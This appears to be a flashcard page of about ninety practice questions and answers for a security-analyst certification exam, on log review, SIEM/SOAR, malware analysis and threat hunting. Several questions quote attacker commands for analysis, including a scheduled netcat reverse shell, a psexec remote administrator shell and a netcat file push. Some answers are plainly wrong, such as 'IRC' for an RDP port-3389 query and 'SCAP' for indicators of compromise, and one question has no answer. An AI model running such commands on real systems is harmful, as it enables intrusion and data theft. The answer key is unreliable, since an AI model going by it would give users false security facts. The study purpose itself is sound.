18 ) SY EX.2 | COMPLETE | 暗記メーカー

18 ) SY EX.2 | COMPLETE

91問 • 5ヶ月前

問題一覧

//////////////////////// James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?

- Different antimalware engines call the same malware package by different names.

Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface?

- Performance Monitor

Abul wants to identify typical behavior on a Windows system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time performance and over a period of time?

- resmon

The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?

- Building a similarity graph of similar functions across binaries

What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?

- Remote execution of code

Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances?

- 80 and 443

While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?

- Availability

After her discovery in the previous question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows: Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute. The average administrator at Lucy's organization is responsible for 150–300 machines. What danger does Lucy's alert create?

- Administrators may ignore or filter the alerts

Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?

- Behavior

Disabling unneeded services is an example of what type of activity?

- Reducing the threat attack surface area

Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?

- An RDP connection m

Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?

- /var/log/auth.log

What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?

- If files in the directory have changed

While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?: psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe

- The user has opened an interactive command prompt as administrator on a remote workstation.

While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What concern should Kwame have about what is happening?

- A denial-of-service attack.

While reviewing Windows event logs for a Windows system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?

- Another antivirus program has interfered with the scan.

Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?

- Allowlisting

Gabby executes the following command. What is she doing? ps -aux | grep apache2 | grep root

While reviewing email headers, Saanvi notices an entry that reads as follows: From: “John Smith, CIO” <jsmith@example.com> with a Received: parameter that shows mail.demo.com [10.74.19.11]. Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?

- The headers were forged to make it appear to have come from John Smith.

Fiona wants to prevent email impersonation of individuals inside her company. What technology can best help prevent this?

- DMARC

Which of the items from the following list is not typically found in an email header?

- Private key

Ian wants to leverage multiple threat flows and is frustrated that they come in different formats. What type of tool might best assist him in combining this information and using it to further streamline his operations?

- SOAR

Cassandra is classifying a threat actor, and she describes the actor as wanting to steal nuclear research data. What term best describes this information?

- A goal m

During a log review, Mei sees repeated firewall entries, as shown here: Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0] Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0] Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0] Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0] What service is the remote system most likely attempting to access?

- Oracle

While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?

- A shuffler

While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP address. What should Nara report has occurred? [ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0 [ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0 [ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0 [ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0 [ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0

- A vulnerability scan

Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where in the following image should she add a rule intended to block this type of traffic?

- The firewall m

Cormac needs to lock down a Windows workstation that has recently been scanned using Nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections?

- No ports should be open.

Frank's team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team? select * from network-events where data.process.image.file = ‘cmd.exe’ AND data.process.parentImage.file != ‘explorer.exe’ AND data.process.action = ‘launch’

- Processes other than explorer.exe typically do not launch command prompts. m

Mark writes a script to pull data from his security data repository. The script includes the following query: select source.name, data.process.cmd, count(*) AS hostcount from windows-events where type = ‘sysmon’ AND data.process.action = ‘launch’ AND data.process.image.file = ‘reg.exe’ AND data.process.parentImage.file = ‘cmd.exe’ He then queries the returned data using the following script: select source.name, data.process.cmd, count(*) AS hostcount from network-events where type = ‘sysmon’ AND data.process.action = ‘launch’ AND data.process. image.file = ‘cmd.exe’ AND data.process.parentImage.file = ‘explorer.exe’ What events will Mark see?

- Registry edits launched via the command line from Explorer m

Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?

- Place a network firewall between the devices and the rest of the network.

Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run?

- top

What issue should Amanda report to the system administrator?

- High CPU utilization

What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?

- top

What command can Amanda use to terminate the process?

- kill

While reviewing output from the netstat command, John sees the following output. What should his next action be?

- Initiate the organization's incident response plan.

What does EDR use to capture data for analysis and storage in a central database?

- Software agents

While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured: ln /dev/null ~/.bash_history What action was this user attempting to perform?

- Logging all shell commands to /dev/null

Charles wants to determine whether a message he received was forwarded by analyzing the headers of the message. How can he determine this?

- You cannot determine if a message was forwarded by analyzing the headers.

While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?

- Check the passwd binary against a known good version.

Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes?

- Service replacement

Matt is reviewing a query that his team wrote for their threat-hunting process. What will the following query warn them about? select timeInterval(date, ‘4h’), `data.login.user`, count(distinct data.login.machine.name) as machinecount from network-events where data.winevent.EventID = 4624 having machinecount> 1

- Users who are logged in to more than one machine within four hours

Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?

- strings

Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on: root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3 root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment] Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)

- 714

Damian has discovered that systems throughout his organization have been compromised for more than a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?

- APT

While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred? root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7::: > daemon:*:16820:0:99999:7::: > bin:*:16820:0:99999:7::: > sys:*:16820:0:99999:7::: > sync:*:16820:0:99999:7::: > games:*:16820:0:99999:7::: > man:*:16820:0:99999:7::: > lp:*:16820:0:99999:7::: > mail:*:16820:0:99999:7::: > news:*:16820:0:99999:7::: > uucp:*:16820:0:99999:7::: > proxy:*:16820:0:99999:7::: > www-data:*:16820:0:99999:7::: > backup:*:16820:0:99999:7::: > list:*:16820:0:99999:7::: > irc:*:16820:0:99999:7:::

- /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this?

- API

Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks?

- The email signature block

Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?

- Scanning all email using an antimalware tool

James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in?

- A sandbox

Luis discovers the following entries in /var/log/auth.log. What is most likely occurring? Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2 Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2 Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2 Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2 Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2 Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2 Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2 Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2 Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2 Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2

- A brute-force attack against the root account.

Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?

- Change sshd_config to deny root login.

Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command: at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe What does it do?

- It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 p.m.

While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries: Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3 Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2 Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth] Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth] Which of the following has not occurred?

- Fail2ban has blocked the SSH login attempts.

Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use?

- A sandbox tool

While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command: nc -l -p 43501 < example.zip What happened?

- The user set up netcat as a listener to push example.zip.

Susan is hunting threats and performs the following query against her database of event lots. What type of threat is she looking for? Select source.name, destination.name, count(*) from network-events, where destination.port = ‘3389’

- IRC

Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows workstations?

- Using application allowlisting to prevent all prohibited programs from running.

Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean? -rwxrw-r&—1 chuck admingroup 1232 Feb 28 16:22 myfile.txt

- User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.

While reviewing web server logs, Danielle notices the following entry. What occurred? 10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200

- An attempt to edit the 404 page.

Melissa wants to deploy a tool to coordinate information from a wide range of platforms so that she can see it in a central location and then automate responses as part of security workflows. What type of tool should she deploy?

- SOAR

While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?

- A VPN application

While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?

- Anomalous behavior

How does data enrichment differ from threat feed combination?

- Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information. m

Which of the following capabilities is not a typical part of a SIEM system?

- Performance management

Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?

- Install and use Tripwire.

Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?

- Anomalies in privileged account usage

Megan wants to check memory utilization on a macOS-based system. What Apple tool can she use to do this?

- Activity Monitor

Fiona is considering a scenario in which components that her organization uses in its software that come from public GitHub repositories are Trojaned. What should she do first to form the basis of her proactive threat-hunting effort?

- Form a hypothesis.

Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?

- An awareness campaign

Micah wants to use the data he has collected to help with his threat-hunting practice. What type of approach is best suited to using large volumes of log and analytical data?

- AI/ML-based investigation

Dani wants to analyze a malware package that calls home. What should she consider before allowing the malware to “phone home”?

- All of the above.

As part of her threat-hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?

- To leverage the similarity of threat profiles

Unusual outbound network traffic, abnormal HTML response sizes, DNS request anomalies, and mismatched ports for application traffic are all examples of what?

- SCAP

Naomi wants to improve the detection capabilities for her security environment. A major concern for her company is the detection of insider threats. What type of technology can she deploy to help with this type of proactive threat detection?

- UEBA

Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators?

- All of the above

Isaac wants to write a script to query the BotScout forum bot blocklisting service. What data should he use to query the service based on the following image?

- IP address

Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?

- Methods of data ingestion

Yaan uses multiple data sources in his security environment, adding contextual information about users from Active Directory, geolocation data, multiple threat data feeds, as well as information from other sources to improve his understanding of the security environment. What term describes this process?

- Data enrichment

Mila is reviewing feed data from the MISP open-source threat intelligence tool and sees the following entry: "Unit 42 has discovered a new malware family we've named "Reaver" with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.", "Tag": [{"colour": "#00223b", "exportable": true, "name": "osint:source-type=\"blog-post\""}], "disable_correlation": false, "object_relation": null, "type": "comment"}, {"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47- 1c7c-4353-8523-440b950d210f", "timestamp": "1510922426", "to_ids": false, "value": "%COMMONPROGRAMFILES%\\services\\", "disable_correlation": false, "object_relation": null, "type": "regkey"}, {"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp": "1510922426", "to_ids": false, "value": "%APPDATA%\\microsoft\\mmc\\", "disable_correlation": false, "object_relation": null, "type": "regkey"}, {"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-91e0- 4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids": false, "value": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ Shell Folders\\Common Startup" How does the Reaver malware maintain persistence?

- Inserts itself into the Registry

Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?

- Machine learning

What is the advantage of a SOAR system over a traditional SIEM system?

- SOAR systems integrate a wider range of internal and external systems.

Fiona has continued her threat-hunting efforts and has formed a number of hypotheses. What key issue should she consider when she reviews them?

- Her own natural biases

Nathan wants to determine which systems are sending the most traffic on his network. What low-overhead data-gathering methodology can he use to view traffic sources, destinations, and quantities?

- Implementing NetFlow

Adam is reviewing a Wireshark packet capture in order to perform protocol analysis, and he notes the following data in the Wireshark protocol hierarchy statistics. What percentage of traffic is most likely encrypted web traffic?

- 20.3 percent

Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?

- 49.51.172.56

Steve uploads a malware sample to an analysis tool and receives the following messages: >Executable file was dropped: C:\Logs\mffcae1.exe >Child process was created, parent C:\Windows\system32\cmd.exe >mffcae1.exe connects to unusual port >File downloaded: cx99.exe If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?

- Wireshark

Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same datacenter, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., and one records the entry at 6 p.m. What issue has Abdul likely encountered?

- An incorrect time zone setting

Eric is performing threat intelligence work and wants to characterize a threat actor that his organization has identified. The threat actor is similar to the group known as Anonymous and has targeted organizations for political reasons in the past. How should he characterize this threat actor?

- Hacktivist

What do DLP systems use to classify data and to ensure that it remains protected?

- Business rules

/////////////////////////////// Benicio wants to implement a tool for all the workstations and laptops in his company that can combine behavioral detection attack indicators based on current threat intelligence with real-time visibility into the systems. What sort of tool should he select?

- An EDR

THE P.T: 1 CHRONICLE: ( ex.9 )

The R.S.S.H Delivery Company · 90問 · 6ヶ月前

THE P.T: 1 CHRONICLE: ( ex.9 )